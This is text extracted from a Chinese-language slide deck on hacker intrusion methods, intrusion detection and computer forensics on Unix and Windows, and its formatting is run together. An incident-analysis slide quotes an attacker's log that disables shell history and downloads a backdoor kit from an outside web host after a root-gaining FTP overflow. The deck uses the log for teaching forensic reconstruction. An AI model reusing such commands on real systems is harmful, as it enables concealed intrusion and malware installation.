黑客入侵常用方法与防范措施

黑客入侵防范技术综述许榕生中科院高能物理所计算中心

研究员国家计算机网络入侵防范中心首席科学urs@GlobalOpportunities622Mbps+10Gbpsl

基于MotorolaDragonBall系列的处理器

68k核心：DragonBall68328、EZ、VZ、

SuperVZ

ARM核心：DragonBallMX1

网络存在的安全威胁

网络内部、外部泄密拒绝服务攻击逻辑炸弹特洛伊木马黑客攻击计算机病毒信息丢失、篡改、销毁后门、隐蔽通道蠕虫黒客攻击技术

入侵系统类攻击

信息窃听

Sniffer

口令攻击John漏洞攻击WIN/IIS、RPC缓冲区溢出攻击获取ROOT口令欺骗类攻击拒绝服务攻击DDOS拒绝服务攻击分布式拒绝服务攻击对防火墙等安全设备的攻击利用病毒攻击木马程序攻击后门攻击……网络安全防范体系图

Internet路由器管理平台安全监控设备防火墙IDS防病毒服务器内部网备份系统网络隐患扫描系统陷阱机取证系统其它智能系统广域网的基本概念广域网组成：结点交换机+链路

结点交换机执行分组存储转发的功能；

一个结点交换机可连接多个信道。距离：广域网相隔几十或几百公里甚至几千公里。提供的两类服务网络隐患扫描HP-UXScoSolarisNT服务器Web服务器NT安全管理员评估、服务检查、攻击性测试、提交安全建议报告等功能

网络隐患扫描硬件产品化

iTOPNet-Scanner网络入侵检测系统—IDSHP-UXScoSolarisNT服务器Web服务器NT实时发现、发布警报、与防火墙联动等功能分布式IDS架构产品图NIDS产品技术(一)降低误报率与漏报率基于应用会话的分析检测技术高级模式匹配无阻塞处理实时响应技术提供多种响应方式响应过滤技术防火墙互动开放接口--OpenNIDSNIDS产品技术(二)系统自身保护无IP抓包响应过滤模块化多重监控应用部署支持双向连接及加密认证引擎串接部署参考对比表格项目产品引擎平台检测项目双向连接防范STICK警报过滤无IP抓包响应方法RealSecureNTSolaris500～600不支持不支持支持支持R,V,L,M,O,SeTrustNT300不支持支持不支持支持R,V,L,MO,SNISDetectorLinux300不支持不支持不支持支持R,V,L天阗Linux？不支持？不支持支持R,V,L,M,T天眼Linux850支持支持TCP数据攻击警报过滤支持支持R,V,L,M,T,S,O,GNIDS技术－体系结构网络入侵检测系统示意图简单网络环境复杂网络环境安全产品的性能问题规则集

膨胀产品性能降低流量增加网络入侵监控系统—IMSHP-UXScoSolarisNT服务器Web服务器NT指定IP、实时发现、制止阻断IP包的格式普通用户普通用户HUB/SWITCH普通用户普通用户HUB/SWITCHHUB路由器/网关监控系统Internet网络入侵取证系统—nIFS识别保存分析提交国际计算机网络安全技术交流

FIRST年会介绍

FIRST（ForumofIncidentResponseandSecurityTeams）计算机网络事件响应和安全组织论坛。旨在联络全世界的网络安全组织以及专家，针对日益严重的网络安全课题采取技术及管理对策的高级研讨会。该会议已在世界各地召开过，其中包括：法国的图卢兹、美国的芝加哥、澳大利亚的布里斯班、墨西哥的蒙特雷、英国的布鲁斯托尔以及美国加州的克拉拉。每届都有来自30多个不同国家的大致300多位参加者，我国代表近几年参加会议。

近年FIRST年会讨论的热点内容

主要集中几个方面：

1.取证方面：相关的技术报告有：

1）ForensicDiscovery（取证的发现）；2）文件系统的内部结构调查导引；3）WindowsXP客户端的取证功能；4）计算机取证在网络入侵调查中的重要作用；5）计算机取证协议与步骤的标准化；

6）Pdd:手持式操作系统设备的存储映像与取证分析。近年FIRST年会讨论的热点内容

主要集中几个方面：

2.传统安全防护技术和手段的报告，如：1）使用个人防火墙加固安全防范；2）使用Ethereal实现入侵检测；3）电子商务的安全：保护Web应用；4）ESA网络安全策略的设计、处理及其实现；5）NASIRC公告板实现方法和PKI；6）UDP扫描的问题；7）一种防止绕过NIDS的适应规则评估算法（ARE）；8）识别路由器配置中的安全漏洞；近年FIRST年会讨论的热点内容

主要集中几个方面：

3.事件或具体攻击的分析研究报告：一个全球性Internet蠕虫事件的调查；

911事件的相关情况报告；

DoS攻击数据流量的分析；SYNDEF:战胜DoS/DDoSSYN洪水攻击的一种方法。4.与法律相关的报告：CERTs新的合法性问题讨论；CSIRT培训：合法性问题；版权侵范问题-未来十年事件响应的最大挑战；5.标准方面的报告：CVE的研究进展报告；传统防范工具的局限防火墙用于网络隔离与过滤，仅类似于门岗。大多数入侵检测系统（IDS）依赖于网络数据的片断，从法律的角度来看证据不够完整；但可以将IDS看作盗贼警报。=>网络取证设备如视频相机用来捕获盗贼的行踪记录证据，通过分析报告或者提交法庭、或者提供加强防卫的具体措施。入侵取证

取证(Forensic)针对计算机入侵与犯罪进行证据获取、保存、分析和出示的科学与技术。

证据的分析可以看作是对受侵计算机系统进行详细的解剖过程，对入侵的事件过程进行重建。所提供的计算机证据与分析必须能够给法庭呈堂供证。取证科学取证技术的有效性和可靠性以及取证专家基于科学分析的结果所得出的报告将作为法庭判决至关重要的依据。整个取证过程中需要遵照操作规程和协议以确保证据进行过正确的分析并保证自始至终没有被篡改过。入侵取证技术动态1995年的一项美国SecretService调查报告指出，70％的法律部门拥有自己的计算机取证实验室，美国国防部至少在六年前就存在计算机取证实验室(CFLab)，近年来披露出丰富的实用工具与产品。中国至今还缺乏入侵取证方面专门有效的产品。

21世纪的网络安全管理与取证技术

13届FIRST年会报告Forensic（取证）的定义计算机犯罪斗争中的体系结构、IDS和取证技术一种新的取证范例案例研究-IIS

漏洞（2001年中美黑客大战）2002年安然事件Guardent公司入侵取证模型技术标准类法律基准证据的法律和法规技术基准分析策略技术解决方案法律标准类（一）网络入侵取证

网络取证的设计与有关步骤从网络取证的定义来看，需要进行的四个步骤是：识别保存分析提交网络取证分析过程系统信息分析模块网络数据分析模块相关性分析模块分析结果报表审计数据分析子模块系统日志分析子模块入侵分析子模块还原分析子模块统计分析子模块取证机记录系统信息网络数据事件分析案例按照时间顺序重建事件（2001年）12/0212:04-13:23使用pingfloods攻击（flows）12/0310:57-11:23缓慢扫描（flows）12/0211:24telnet到（flows）12/0311:24显示4个失败登录（syslog）12/0311:24成功登录到romig@12/0311:24-12:23roming帐号运行exploit脚本，该脚本调用了ls、ps、rm。事件分析案例USERftp331Guestloginok,sendyourcompletee-mailaddressaspassword.PASSmozilla@unsetHISTFILE;id;uname-a;uid=0(root)gid=0(root)groups=50(ftp)whereislynxlynx:/usr/bin/lynx/etc/lynx.cfg/usr/share/man/man1/lynx.1.gzTERM="linux“lynxhttp://james84.supereva.it/.1/kit.tgz事件分析案例（续）入侵来源：0（欧洲）简单描述：利用被取证机提供的FTP匿名服务，造成缓冲区溢出，入侵者已获得root权限。开始时间：03/16/2002-10:44:22结束时间：03/16/2002-11:08:33详细过程：10:44用户FTP匿名登录，并用mozilla@作为密码，向被取证机发送缓冲区溢出程序，并成功攻入获得了root权限。10:53开始用lynx从网站

http://james84.supereva.it/.1/kit.tgz下载程序。11:08下载完毕。在被取证机上安装了后门。

（二）计算机取证

文件被删除后…典型的Unix和linux文件系统：ffs*,ext2fs**等当文件被删除时何种信息被破坏，何种信息被保留获取被删除文件信息的技巧和工具UNIX/Linux文件系统directory/home/you

foo123bar456andsoon…

inode123owner/groupIDmactimesreferencecountfile/directory/etcdatablock#saccesspermsfilesizedatablocksdatablockdatablockdatablock直接和间接数据块inodeblock0block111indirect2indirect3indirectblock12blk20591indirect1indirect2indirect2indirectblk206041963631indirect1indirect…………………SpecificblocknumberaretypicalforBerkeleyFFS-likesystems典型的UNIX/Linux磁盘布局label/swap/usrpartition/homepartition

zonezonezonezonezone

superinodedatainodedatablockbitmapbitmapblocksblocks---Entiredisk---UNIX/LinuxfilesystemFilesystemzone如果可能的话，文件的所有数据会放在同一区域内文件被删除后保留的信息directory/home/youFoo123bar456andsoon…

inode123owner/groupIDmactimes**referencecount*file/directory/etcdatablock#saccesspermsfilesizedatablocksdatablockdatablockdatablock=UNIX+LINUX=LINUXonly*zeroreferences**statuschangetime=timeofdeletion被删除文件信息能存活很长时间现代操作系统避免了文件的分片现代操作系统将同一文件的所有信息存放在一个磁盘区域现代操作系统将相关的文件放在同一磁盘区域（比如，文件放在同一目录下）所有这些有利于操作和恢复好处：一个磁盘区域中的活动不会影响另一磁盘区域中的内容获取被删除文件信息的工具Coroner’stoolkitutilities（TCT): －通过inode获取文件的属性:ils/dev/hda830199 －通过inode获取文件内容:icat/dev/hda8

30199 －获取(未分配的)数据块:unrm/dev/hda8TCTutilsutilities(BrianCarrier) －列出（未分配的）目录项：fls/dev/hda8 －其他

这些工具同样也能在文件被删除前使用。计算机取证

—WINDOWS2000/XP

平台

NTFS文件系统磁盘结构NTFS中元数据特征Windows2000/xp

的日志文件Windows2000/xp

的注册表Windows2000/xp系统的一些应用文件文件格式一些应用程序的缓冲文件一个取证系统的构想NTFS文件系统特性作为世界上第一种同时成功的应用在企业级和家用两个领域的文件系统，NTFS文件系统具有以下3个特性：可恢复性安全性数据冗余和容错NTFS文件磁盘结构NTFS以卷为基础的文件系统。它以簇为磁盘空间分配和回收的基本单位，NTFS的存储空间以簇为单位进行划分和管理。在NTFS文件系统中，簇的大小称为卷因子。NTFS中的元数据在NTFS中，所有的数据（包括元数据）都存储在文件中元数据：用于文件定位和恢复的数据结构、引导程序结构以及记录整个卷的分配状态的位图等最重要的元数据文件是MFT（MasterFileTable主控文件表），它包含NTFS卷中所有文件的信息有用的功能这一部分可以用于取证和反删除的主要有$mft、$logfile、$bitmap几个恢复工具Recover4all/FinalData.tw/intro/utility_file/utility_file_rescue/11970_dl.htmlEasyRecovery/EASYRECOVERY.HTMFileScavenger/Windows2000/xp中的系统日志文件安全日志文件：%systemroot%system32\config\SecEvent.EVT系统日志文件：%systemroot%system32\config\SysEvent.EVT应用程序日志文件：%systemroot%system32\config\AppEvent.EVTInternet信息服务FTP日志默认位置：%systemroot%system32\logfile\smsftpsvc1，默认每天一个日志Internet信息服务WWW日志默认位置：%systemroot%system32\logfiles\w3svc1，默认每天一个日志用户日志文件用户日志文件保存在根目录“DocumentsandSettings”下用户名的目录中，包括3个文件：

NTUSER.DATNTUSER.INI

ntuser.dat.LOG注册表

c:\windows\system32\config\systemc:\windows\system32\config\software

c:\windows\system32\config\sam

c:\windows\system32\config\security

c:\windows\system32\config\default一些应用文件格式如word、wps、outlook收信箱、foxmail信箱、qq的聊天纪录等

典型foxmail邮件箱格式一些应用程序缓冲IE浏览器的上网缓冲c:\DocumentsandSettings\用户目录\LocalSettings\TemporaryInternetFiles\系统最近的文档c:\DocumentsandSettings\用户目录\recent\Office最近的文档c:\DocumentsandSettings\用户目录\LocalSettings\ApplicationData\microsoft